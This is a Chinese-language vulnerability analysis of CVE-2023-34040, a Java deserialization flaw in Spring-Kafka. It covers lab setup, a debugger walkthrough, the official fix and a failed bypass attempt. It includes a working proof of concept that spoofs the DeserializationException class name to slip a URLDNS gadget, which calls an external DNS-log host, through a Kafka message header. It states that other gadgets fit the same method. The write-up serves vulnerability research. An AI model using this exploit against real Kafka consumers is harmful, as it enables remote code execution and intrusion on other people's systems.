Spring-Kafka 反序列化漏洞(CVE-2023-34040)分析

当受影响版本的 Spring-Kafka Consumer 未对Record配置 ErrorHandlingDeserializer 并设置 checkDeserExWhenKeyNull 或 checkDeserExWhenValueNull 为 true 且攻击者可以发布 Kafka 消息时,将会存在Java反序列化漏洞。只需发布 key 或 value 为 null 的消息,且在相应的header中放入序列化数据,便可以任意反序列化

Spring-Kafka

Spring-Kafka 、 kafka-clients 和 Spring Boot 的版本对应关系参考官方文档: https://spring.io/projects/spring-kafka#overview

Kafka 可以使用 ZooKeeper 或以 KRaft 模式启动,这里用 Docker 以 KRaft 模式启动Kafka:

1
2
3
4
5
6
7
8
docker run --rm -d --name kafka-server --hostname localhost -p 9092:9092 \
-e KAFKA_CFG_NODE_ID=0 \
-e KAFKA_CFG_PROCESS_ROLES=controller,broker \
-e KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093 \
-e KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT \
-e KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@localhost:9093 \
-e KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER \
bitnami/kafka:3.5.1

IDEA中创建maven项目,添加依赖

1
2
3
4
5
6
7
8
9
10
<dependency>
<groupId>org.springframework.kafka</groupId>
<artifactId>spring-kafka</artifactId>
<version>2.9.10</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<version>2.7.8</version>
</dependency>

参考https://docs.spring.io/spring-kafka/docs/2.9.10/reference/html/#getting-started 写出消费者和生产者的Demo:

1
2
3
spring:
kafka:
bootstrap-servers: 127.0.0.1:9092
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
package org.example;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.kafka.annotation.KafkaListener;

@SpringBootApplication
public class Application {

public static void main(String[] args) {
SpringApplication.run(Application.class, args);
}

@KafkaListener(id = "myId", topics = "myTopic")
public void listen(String in) {
System.out.println(in);
}

}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
package org.example;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.kafka.core.KafkaTemplate;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class Controller {

@Autowired
private KafkaTemplate<Object, Object> template;

@GetMapping(path = "/send")
public void send() {
this.template.send("myTopic", "hello");
}

}

漏洞分析

参考官方公告: https://spring.io/security/cve-2023-34040 ,漏洞影响组件及版本为 Spring for Apache Kafka 2.8.1 to 2.9.10、3.0.0 to 3.0.9,利用条件如下:

  • 没有为 Record 的 key 或 value 设置 ErrorHandlingDeserializer
  • 将 checkDeserExWhenKeyNull 或 checkDeserExWhenValueNull 设置为 true
  • 允许不受信任的源发布Kafka主题

漏洞在Consumer侧触发,修改Consumer,以设置 checkDeserExWhenKeyNull 和 checkDeserExWhenValueNull:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
package org.example;

import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.boot.autoconfigure.kafka.KafkaProperties;
import org.springframework.context.annotation.Bean;
import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.kafka.config.ConcurrentKafkaListenerContainerFactory;
import org.springframework.kafka.core.DefaultKafkaConsumerFactory;
import org.apache.kafka.common.serialization.StringDeserializer;
import java.util.HashMap;
import java.util.Map;

@SpringBootApplication
public class Application {

public static void main(String[] args) {
SpringApplication.run(Application.class, args);
}

@KafkaListener(id = "myId", topics = "myTopic")
public void listen(String in) {
System.out.println(in);
}

@Autowired
private KafkaProperties kafkaProperties;

@Bean
public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
Map<String, Object> props = new HashMap<>();
props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, kafkaProperties.getBootstrapServers());
props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);
props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);

ConcurrentKafkaListenerContainerFactory<String, String> factory = new ConcurrentKafkaListenerContainerFactory<>();
factory.setConsumerFactory(new DefaultKafkaConsumerFactory<>(props));
factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);
factory.getContainerProperties().setCheckDeserExWhenValueNull(true);
return factory;
}

}

同时修改Producer,以自定义key、value和header

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
package org.example;

import org.apache.kafka.clients.producer.ProducerRecord;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.kafka.core.KafkaTemplate;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class Controller {
@Autowired
private KafkaTemplate<Object, Object> template;

@GetMapping(path = "/send")
public void send() {
ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic","key",null);
this.template.send(producerRecord);
}
}

由 checkDeserExWhenKeyNull 和 checkDeserExWhenValueNull 名称可知当这两项配置为true,并且Record的key或value为null的时候会触发反序列化,所以以上代码中,我设置了value部分为null

org.springframework.kafka.listener.ListenerUtils#getExceptionFromHeader设置断点,并用Producer发送消息

当value为null时,会取header中的springDeserializerExceptionValue,接着修改Producer的代码,添加header,再次发送消息

1
2
3
4
5
public void send() {
ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic","key",null);
producerRecord.headers().add("springDeserializerExceptionValue", "leixiao".getBytes());
this.template.send(producerRecord);
}

最终会在org.springframework.kafka.listener.ListenerUtils#byteArrayToDeserializationException进行反序列化

这里使用了resolveClass对反序列化的类进行了限制,限制类名只能是org.springframework.kafka.support.serializer.DeserializationException,但是通过this.first字段实现只检查一次反序列化类名,所以该类如果有其他类型的字段,或者嵌套着其他对象的序列化数据,那仍然是可以正常反序列化的

为了构造顶层类为org.springframework.kafka.support.serializer.DeserializationException并且嵌套着其他对象的序列化数据,我们可以先建一个类名为xrg.springframework.kafka.support.serializer.DeserializationException的类,然后在其字段里自由构造,最后直接修改序列化数据中的类名,如下POC:

1
2
3
4
5
6
7
8
9
10
11
package xrg.springframework.kafka.support.serializer;

import java.io.Serializable;

public class DeserializationException implements Serializable {
private static final long serialVersionUID = 8280022391259546509L;
private Object foo;
public DeserializationException(Object foo) {
this.foo = foo;
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
package org.example;

import org.apache.kafka.clients.producer.ProducerRecord;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.kafka.core.KafkaTemplate;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;
import java.io.*;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;

@RestController
public class Controller {
@Autowired
private KafkaTemplate<Object, Object> template;

@GetMapping(path = "/send")
public void send() throws Exception {
ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic","key",null);
producerRecord.headers().add("springDeserializerExceptionValue", getPOC());
this.template.send(producerRecord);
}

public static byte[] getPOC() throws Exception {
Object urldns = getURLDNS("http://leixiao.cff03fad.dnslog.store");
Object o =new xrg.springframework.kafka.support.serializer.DeserializationException(urldns);
byte[] data = serialize(o);
data[8] = "o".getBytes()[0];
return data;
}

public static Object getURLDNS(final String url) throws Exception {
URLStreamHandler handler = new SilentURLStreamHandler();
HashMap<URL,String> hashMap = new HashMap<URL,String>();
URL u = new URL(null, url, handler);
hashMap.put(u, url);
Field hashcode = u.getClass().getDeclaredField("hashCode");
hashcode.setAccessible(true);
hashcode.set(u,-1);
return hashMap;
}
static class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
public static byte[] serialize(final Object obj) throws Exception {
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream= new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(obj);
return byteArrayOutputStream.toByteArray();
}

}

这里构造了URLDNS的POC,当然如果存在其他Gadget,都是可以按这个方法构造的

漏洞修复

把spring-kafka 版本换到 2.9.11,重新运行一下POC,报错...[Payload value must not be empty]...,可能是新版不允许value为null的情况了?试着让key为null:

1
2
ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic",null,"value");
producerRecord.headers().add("springDeserializerExceptionKey", getPOC());

运行POC,此时代码也无法执行到org.springframework.kafka.listener.ListenerUtils#getExceptionFromHeader了,而且控制台提示如下:

1
2
WARN 62418 --- [     myId-0-C-1] o.s.k.l.KafkaMessageListenerContainer    : Foreign deserialization exception header in (myTopic-0@10) ignored; possible attack?
value

具体逻辑在org.springframework.kafka.support.serializer.SerializationUtils#getExceptionFromHeader

可见,只有当header为DeserializationExceptionHeader才能继续执行,但是我们的header类型是RecordHeader,我想过在Producer中反射修改header的类型去绕过:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Class<?> exceptionHeaderClass = Class.forName("org.springframework.kafka.support.serializer.DeserializationExceptionHeader");
Constructor<?> exceptioHeaderConstructor = exceptionHeaderClass.getDeclaredConstructors()[0];
exceptioHeaderConstructor.setAccessible(true);
Header exceptionHeader = (Header) exceptioHeaderConstructor.newInstance("springDeserializerExceptionKey", getPOC());
Header[] headers = new Header[]{exceptionHeader};

ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic",null,"value");

Field headersField =producerRecord.getClass().getDeclaredField("headers");
headersField.setAccessible(true);
Field modifersField = Field.class.getDeclaredField("modifiers");
modifersField.setAccessible(true);
modifersField.setInt(headersField, headersField.getModifiers() & ~Modifier.FINAL);
headersField.set(producerRecord,new RecordHeaders(headers));

this.template.send(producerRecord);

但是Consumer收到的Record中的header类型还是RecordHeader,后面用Wireshark抓包看了下,两种header的类型并未在数据包中有体现,数据包中只有header的键值对,换句话说,Consumer收到的Header类型应该不是Producer可控的

后面通过在RecordHeader构造函数设置断点找到了Consumer构造Record的地方:org.apache.kafka.common.record.DefaultRecord#readFrom(java.nio.ByteBuffer, int, int, long, long, int, java.lang.Long)

构造header位置:org.apache.kafka.common.record.DefaultRecord#readHeaders

很可惜,从这里代码来看,header只能是RecordHeader

详细修复代码见:https://github.com/spring-projects/spring-kafka/pull/2770/files

参考

https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040